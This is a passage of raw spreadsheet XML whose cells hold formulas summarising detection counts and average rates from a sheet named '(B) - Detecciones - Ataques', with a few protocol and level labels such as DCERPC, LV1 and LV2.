        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GO29" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="GP29" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="GQ29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="GR29" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="GS29" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="GT29" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="GU29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="GV29" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0</v>
      </c>
      <c r="HC29" s="370" t="s">
        <v>7</v>
      </c>
      <c r="HD29" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!DK3:DK139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.2551852373</v>
      </c>
      <c r="HE29" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!DL3:DL139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.3272727273</v>
      </c>
      <c r="HF29" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!DK3:DK139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.1414141414</v>
      </c>
      <c r="HG29" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!DL3:DL139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.1851851852</v>
      </c>
    </row>
    <row r="30">
      <c r="B30" s="277"/>
      <c r="C30" s="271"/>
      <c r="D30" s="271"/>
      <c r="E30" s="271"/>
      <c r="F30" s="271"/>
      <c r="G30" s="278"/>
      <c r="J30" s="277"/>
      <c r="K30" s="386" t="s">
        <v>2466</v>
      </c>
      <c r="L30" s="387" t="s">
        <v>2467</v>
      </c>
      <c r="M30" s="387" t="s">
        <v>2468</v>
      </c>
      <c r="N30" s="388" t="s">
        <v>2469</v>
      </c>
      <c r="O30" s="278"/>
      <c r="Q30" s="271"/>
      <c r="R30" s="352" t="s">
        <v>2470</v>
      </c>
      <c r="S30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$S27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*") </f>
        <v>13631</v>
      </c>
      <c r="T30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$T27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $T27 &amp; "*") </f>
        <v>701939</v>
      </c>
      <c r="U30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$U27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $U27 &amp; "*") </f>
        <v>126</v>
      </c>
      <c r="V30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$V27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $V27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="W30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$W27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $W27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="X30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$X27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $X27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="Y30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Y27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Y27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="Z30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Z27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Z27 &amp; "*") </f>
        <v>8473</v>
      </c>
      <c r="AA30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AA27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AA27 &amp; "*") </f>
        <v>347</v>
      </c>
      <c r="AB30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AB27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AB27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AC30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AC27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AC27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AD30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AD27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AD27 &amp; "*") </f>
        <v>73035</v>
      </c>
      <c r="AE30" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AE27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AE27 &amp; "*") </f>
        <v>9</v>
      </c>
      <c r="AF30" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AF27) + SUMIFS('(B) - Detecciones - Ataques'!P$3:P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AF27 &amp; "*") </f>
        <v>11515</v>
      </c>
      <c r="AG30" s="271"/>
      <c r="AH30" s="352" t="s">
        <v>2470</v>
      </c>
      <c r="AI30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>13625</v>
      </c>
      <c r="AJ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>4</v>
      </c>
      <c r="AL30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>701939</v>
      </c>
      <c r="AN30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>117</v>
      </c>
      <c r="AR30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>1</v>
      </c>
      <c r="BB30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>3</v>
      </c>
      <c r="BD30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>2</v>
      </c>
      <c r="BG30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>3</v>
      </c>
      <c r="BL30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3292</v>
      </c>
      <c r="BN30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>5180</v>
      </c>
      <c r="BO30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>9</v>
      </c>
      <c r="BZ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>1</v>
      </c>
      <c r="CD30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>1</v>
      </c>
      <c r="CK30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>2</v>
      </c>
      <c r="CN30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>1</v>
      </c>
      <c r="CR30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>72030</v>
      </c>
      <c r="CT30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>1002</v>
      </c>
      <c r="CU30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>2</v>
      </c>
      <c r="CZ30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB30" s="355">
